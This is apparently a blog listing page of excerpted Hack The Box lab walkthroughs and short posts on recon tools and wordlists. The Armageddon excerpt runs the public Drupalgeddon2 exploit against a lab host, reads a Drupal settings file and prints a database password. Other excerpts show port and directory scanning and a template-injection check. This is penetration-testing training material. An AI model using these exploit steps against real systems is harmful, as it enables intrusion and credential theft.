HTB Pennyworth

We continue with another very easy HTB box. $ nmap -p- 10.129.243.77 -sV –min-rate 5000 Here we have a Jetty Jetty 9.4.39.v20210325 Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. https://www.eclipse.org/jetty/ If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F This is a Jenkins server. Leading open source automation server, Jenkins provides hundreds of plugins

HTB Bike

This is another of the HTB Starting Point’s very easy boxes. $ nmap -v -p- -sV 10.129.237.207 –min-rate 5000 Access to http://10.129.237.207/ According to the Nmap scan, the site runs under node.jsWappalyzer describes the Web Framework as Express. There is no email address control checking of the input: In fact, it seems that any input is reflected in the result. If we check for Server-Side Template Injection: The template engine

HTB Ignition

This is another of the Very easy HTB Starting Point boxes. $ sudo nano /etc/hosts $ nmap -p- -A 10.129.232.211 -sV Access to http://ignition.htb/ $ dirsearch -u http://ignition.htb -i 200 Access to http://ignition.htb/admin/ Based on HTB questions, the username is admin. As there is a form_key parameter it’s most difficult to brute-force.So, we can try then to guess manually the password using the most usual passwords. We can find more

HTB Responder

This is another of the HTB Starting Point boxes classified as very easy. $ nmap -p- -min-rate 5000 10.129.225.204 –open -v If we try to access to http://10.129.225.204 we’ll be redirected to http://unika.htb but we can’t see the site. So, let’s add it to our /etc/hostsNow we’ll obtain the correct site: $ whatweb http://unika.htb Here we can see that this site runs with php, over an Windows Apache webserver. Checking

HTB Redeemer

This is one of the starting point HTB boxes.It is rated as a very easy and only have 1 flag. $ nmap -p- -A 10.129.216.146 –min-rate 5000 So, we are facing a Redis v5.0.7 instance. According to its site: Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets,

HTB Armageddon

$ nmap -v -p- -A 10.10.10.233 –min-rate 5000 Site inspection: http://10.10.10.233/ $ whatweb http://10.10.10.233 We are facing a Drupal 7 CMS. $ dirsearch -u http://10.10.10.233/ -i 200 http://10.10.10.233/includes/bootstrap.inc Specifically, it is a Drupal v7.56. Let’s see if this Drupal version has some vulnerability. CVE-2018-7600https://github.com/dreadlocked/Drupalgeddon2 $ git clone https://github.com/dreadlocked/Drupalgeddon2.git$ ruby drupalgeddon2.rb http://10.10.10.233 armageddon.htb>> whoami armageddon.htb>> pwd armageddon.htb>> ls /var/www/html/sites -la armageddon.htb>> ls /var/www/html/sites/default -la armageddon.htb>> cat /var/www/html/sites/default/settings.php Mysql password = CQHEy@9M*m23gBVj

reNgine: A brief overview

ReNgine is a very complete recon tool that can be very helpful to centralize all your recon in one site. Its main website defines it as: «The only web application recon tool you will ever need!« Currently is capable of performing: Subdomain Discovery Vulnerability Detection IPs and Open Ports Identification Directory and files fuzzing Screenshot Gathering Endpoints Gathering OSINT Although reNgine can be installed in a local machine, it is

Script to update go version

Although Go installation it’s a pretty straight-forward process, it can be done even easier if a script is used to install and update your golang installation. We are going to use update-golang script. $ go version $ git clone https://github.com/udhos/update-golang.git $ sudo ./update-golang.sh $ go version To finish the setup, the shell PATH should be updated. The path ‘/usr/local/go/bin’ is added to PATH using ‘/etc/profile.d/golang_path.sh’. Only if needed, GOROOT is

Wordlists for your daily work

When we do pentesting and bug bounty the most important phase is always recon and one of the most important elements for your recon is the wordlist. It is said that «Your recon is as good as your wordlist is». In our Kali Linux, there are by default different good wordlists at /usr/share/wordlists: $ cd /usr/share/wordlists dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt wfuzz While dirb, dirbuster and wfuzz can

FinalRecon (web reconnaissance tool)

As it is described in its website: FinalRecon is an automatic web reconnaissance tool written in python. Goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another it can provide similar results keeping dependencies small and simple. https://github.com/cbk914/finalrecon Installation $ sudo apt install finalrecon Usage $ finalrecon.py <arguments> url